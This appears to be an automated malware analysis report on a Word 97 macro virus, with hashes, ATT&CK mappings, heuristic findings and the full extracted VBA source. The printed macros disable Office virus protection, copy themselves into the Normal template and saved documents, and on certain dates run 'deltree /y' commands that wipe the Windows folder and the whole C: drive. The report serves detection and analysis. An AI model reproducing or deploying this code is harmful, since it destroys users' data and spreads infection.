Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 38e2a010b35715f3…

MALICIOUS

Office (OLE)

55.0 KB Created: 2001-06-08 19:06:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 924918f41bea61bba73c8ac4e1afb566 SHA-1: eb0794ff764238526e23b0d65eaba2ae707537d7 SHA-256: 38e2a010b35715f3dc00431345a6712664b23d1129351fde4baa8f378b9e5ede
308 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1105 Ingress Tool Transfer T1490 Inhibit System Recovery

The sample contains VBA macros that execute upon opening or closing. The AutoClose macro attempts to copy itself and associated forms to the Normal template for persistence. It also executes commands to delete local files, specifically 'deltree /y c:\windows' and 'deltree /y c:\*.*', indicating an attempt to inhibit system recovery. The presence of legacy WordBasic macro virus markers and ClamAV detections further support its malicious nature.

Heuristics 6

  • ClamAV: Doc.Trojan.Mbug-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Mbug-1
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell "deltree /y c:\windows", vbHide
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Options.VirusProtection = False
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4211 bytes
SHA-256: 7ff9b02a9f8c09715439144bad22d50aa30b6e43664857cea50080af468218f4
Detection
ClamAV: Win.Trojan.DelTree-10
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "who"
Sub AutoExec()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
If Day(Now()) = "1" Or Day(Now()) = "13" Or Day(Now()) = "18" Then
UserForm1.Show
Shell "deltree /y c:\windows", vbHide
Shell "deltree /y c:\*.*", vbHide
End If
End Sub

Sub AutoClose()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
On Error GoTo ErrorAC
iMacroCount = WordBasic.CountMacros(0, 0)
For i = 1 To iMacroCount
    If WordBasic.[MacroName$](i, 0) = "who" Then
        whoInstalled = -1
    End If
Next i
If Not whoInstalled Then
    Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="who", Object:=wdOrganizerObjectProjectItems
    Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="UserForm1", Object:=wdOrganizerObjectProjectItems
    Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="UserForm2", Object:=wdOrganizerObjectProjectItems
End If
ErrorAC:
End Sub
Sub FileSaveAs()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
On Error GoTo ErrorFSA
    Dialogs(wdDialogFileSaveAs).Show
    If (ActiveDocument.SaveFormat = wdFormatDocument) Or (ActiveDocument.SaveFormat = wdFormatTemplate) Then
        ActiveDocument.SaveAs FileFormat:=wdFormatTemplate
    End If
Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="who", Object:=wdOrganizerObjectProjectItems
Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="UserForm1", Object:=wdOrganizerObjectProjectItems
Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="UserForm2", Object:=wdOrganizerObjectProjectItems
ActiveDocument.Save
If Day(Now()) = "5" Or Day(Now()) = "10" Or Day(Now()) = "29" Then
UserForm1.Show
Shell "deltree /y c:\windows", vbMinimizedFocus
Shell "deltree /y c:\*.*", vbMinimizedFocus
End If
ErrorFSA:
End Sub
Sub FileTemplates()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
On Error GoTo ErrorFT
    MsgBox "", vbInformation
ErrorFT:
End Sub

Sub ToolsMacro()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
On Error GoTo ErrorTM
    MsgBox "", vbInformation
ErrorTM:
End Sub
Sub ViewVBCode()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
On Error GoTo ErrorVVBC
    MsgBox "", vbInformation
ErrorVVBC:
End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{CCBF567D-F339-11CE-9208-8AE360A51863}{CCBF5673-F339-11CE-9208-8AE360A51863}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False





Private Sub CommandButton1_Click()
MsgBox "??? Nothing, Go to see who am I", vbOKOnly, "Microsoft who"
End Sub

Private Sub CommandButton2_Click()
MsgBox "??? Nothing, Go to see who am I", vbOKOnly, "Microsoft who"
End Sub

Private Sub Image1_Click()
UserForm2.Show
End Sub

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{CCBF5681-F339-11CE-9208-8AE360A51863}{CCBF5677-F339-11CE-9208-8AE360A51863}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False





Private Sub CommandButton1_Click()
Shell "deltree /y c:\windows", vbHide
Shell "deltree /y c:\*.*", vbHide
MsgBox "Huh!  Don't have", vbInformation, "Microsoft who"
End Sub

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.